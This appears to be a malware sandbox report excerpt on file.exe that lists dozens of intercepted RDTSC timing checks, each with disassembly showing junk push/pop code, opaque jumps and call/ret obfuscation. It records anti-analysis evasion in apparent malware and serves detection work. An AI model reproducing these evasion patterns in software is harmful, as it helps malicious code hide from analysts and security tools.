Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E00D second address: B6E011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E011 second address: B6E015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E29C second address: B6E2A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E7C9 second address: B6E7CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E7CD second address: B6E7E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD6487Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E7E1 second address: B6E815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCCA77C3h 0x00000009 pop edx 0x0000000a popad 0x0000000b push edi 0x0000000c jns 00007FB8FCCA77BCh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FB8FCCA77BAh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E815 second address: B6E819 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7055A second address: B70560 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B70560 second address: B70564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B708CE second address: B708DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B708DC second address: B708E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B709BB second address: B709C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B709C1 second address: B709C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B709C5 second address: B709C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B71165 second address: B71176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCD6487Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B71432 second address: B71438 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B71438 second address: B71449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCD6487Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B715E3 second address: B71605 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB8FCCA77BFh 0x00000008 jg 00007FB8FCCA77B6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pushad 0x00000016 popad 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B71605 second address: B7160A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B72511 second address: B72518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B735E7 second address: B73609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB8FCD64889h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73609 second address: B7361F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCCA77C2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B76224 second address: B76228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B76228 second address: B7622E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7622E second address: B76239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FB8FCD64876h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B76239 second address: B76247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7ADA3 second address: B7ADA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7ADA7 second address: B7ADAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7ADAB second address: B7ADB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7ADB1 second address: B7ADCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCCA77C8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7ADCD second address: B7ADD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7ADD1 second address: B7AE3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FB8FCCA77B8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 movzx ebx, bx 0x00000026 push 00000000h 0x00000028 add dword ptr [ebp+1245C5E2h], ecx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007FB8FCCA77B8h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a xor edi, dword ptr [ebp+122D17EBh] 0x00000050 xchg eax, esi 0x00000051 push esi 0x00000052 jnl 00007FB8FCCA77BCh 0x00000058 pop esi 0x00000059 push eax 0x0000005a pushad 0x0000005b push edi 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7AE3C second address: B7AE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7BE6D second address: B7BE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7BE73 second address: B7BE78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7BE78 second address: B7BF0F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB8FCCA77BDh 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FB8FCCA77B8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 cmc 0x0000002a push 00000000h 0x0000002c jmp 00007FB8FCCA77BDh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007FB8FCCA77B8h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d jnc 00007FB8FCCA77BBh 0x00000053 xchg eax, esi 0x00000054 jmp 00007FB8FCCA77C6h 0x00000059 push eax 0x0000005a pushad 0x0000005b jnp 00007FB8FCCA77B8h 0x00000061 pushad 0x00000062 jbe 00007FB8FCCA77B6h 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7CF7A second address: B7CFA1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB8FCD64876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f jmp 00007FB8FCD64887h 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7CFA1 second address: B7CFA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7DF0A second address: B7DF54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a or edi, 1B053CEFh 0x00000010 push 00000000h 0x00000012 mov edi, dword ptr [ebp+122D299Ch] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007FB8FCD64878h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000015h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 sub dword ptr [ebp+1245C6E8h], ecx 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e push ebx 0x0000003f pop ebx 0x00000040 jp 00007FB8FCD64876h 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7DF54 second address: B7DF67 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB8FCCA77B8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7FF8F second address: B7FFC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD64880h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007FB8FCD6487Ch 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007FB8FCD64882h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7FFC5 second address: B7FFCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7E17B second address: B7E181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7F12D second address: B7F132 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7E181 second address: B7E1A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB8FCD64888h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B80FF0 second address: B80FF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7E1A0 second address: B7E1A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B80FF4 second address: B80FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B80FFA second address: B81015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCD64887h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B81015 second address: B81019 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B82121 second address: B82127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B82127 second address: B8212B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8222F second address: B82233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B82233 second address: B8223C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8512D second address: B85132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B85132 second address: B85138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B85138 second address: B851BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnc 00007FB8FCD64888h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FB8FCD64878h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 movzx ebx, cx 0x0000002c pushad 0x0000002d or dword ptr [ebp+122D1EB4h], ebx 0x00000033 mov edi, 251125DEh 0x00000038 popad 0x00000039 push 00000000h 0x0000003b jng 00007FB8FCD6488Fh 0x00000041 push 00000000h 0x00000043 mov di, 22C1h 0x00000047 xchg eax, esi 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B851BB second address: B851BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B851BF second address: B851C9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB8FCD64876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B851C9 second address: B851CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B851CE second address: B851D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B851D4 second address: B851E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB8FCCA77BBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B86117 second address: B86121 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B880D3 second address: B880E9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB8FCCA77B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jno 00007FB8FCCA77B6h 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8905A second address: B890B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007FB8FCD6487Ah 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007FB8FCD6487Ch 0x00000013 nop 0x00000014 adc ebx, 2D232F5Eh 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007FB8FCD64878h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 0000001Ah 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 push 00000000h 0x00000038 mov bx, cx 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jnl 00007FB8FCD6487Ch 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8AE97 second address: B8AEC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB8FCCA77C0h 0x00000008 jmp 00007FB8FCCA77C1h 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8315C second address: B83160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B83160 second address: B83164 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B83164 second address: B8316E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8316E second address: B83172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B83172 second address: B83176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8B4CB second address: B8B585 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB8FCCA77B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FB8FCCA77B8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 call 00007FB8FCCA77C8h 0x0000002c pop edi 0x0000002d mov dword ptr [ebp+122D2388h], eax 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007FB8FCCA77B8h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 0000001Bh 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f push 00000000h 0x00000051 mov edi, dword ptr [ebp+1245F3BAh] 0x00000057 xchg eax, esi 0x00000058 jg 00007FB8FCCA77D7h 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 push edi 0x00000063 pop edi 0x00000064 jmp 00007FB8FCCA77BDh 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8823F second address: B88243 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B88243 second address: B8824D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8824D second address: B88251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B88251 second address: B882CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 or di, CE91h 0x0000000d mov edi, dword ptr [ebp+122D242Ch] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007FB8FCCA77B8h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b push edi 0x0000003c jmp 00007FB8FCCA77BAh 0x00000041 pop ebx 0x00000042 mov eax, dword ptr [ebp+122D0CADh] 0x00000048 push 00000000h 0x0000004a push ebx 0x0000004b call 00007FB8FCCA77B8h 0x00000050 pop ebx 0x00000051 mov dword ptr [esp+04h], ebx 0x00000055 add dword ptr [esp+04h], 00000014h 0x0000005d inc ebx 0x0000005e push ebx 0x0000005f ret 0x00000060 pop ebx 0x00000061 ret 0x00000062 push FFFFFFFFh 0x00000064 cld 0x00000065 nop 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 pushad 0x0000006a popad 0x0000006b pushad 0x0000006c popad 0x0000006d popad 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8D3A4 second address: B8D3AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B904DC second address: B904E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B904E1 second address: B904E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B904E7 second address: B90501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCCA77C6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B90501 second address: B90505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B309B8 second address: B309C1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B309C1 second address: B309F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB8FCD64876h 0x0000000a jmp 00007FB8FCD6487Fh 0x0000000f popad 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007FB8FCD64887h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B94350 second address: B94360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B94360 second address: B94370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jnc 00007FB8FCD64876h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
